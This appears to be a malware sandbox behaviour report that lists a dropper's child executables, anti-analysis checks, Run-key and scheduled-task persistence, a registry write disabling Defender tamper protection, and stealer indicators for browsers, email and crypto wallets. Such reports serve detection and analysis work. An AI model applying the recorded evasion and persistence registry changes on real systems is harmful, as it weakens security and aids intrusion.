N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector


Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b9d8483ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\5b9d8483ee.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccfa1d9368.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\ccfa1d9368.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d9f9e120ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\d9f9e120ef.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\823a6efeda.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\823a6efeda.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\84mBY8Tm\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c1e74e5ed.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\1c1e74e5ed.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
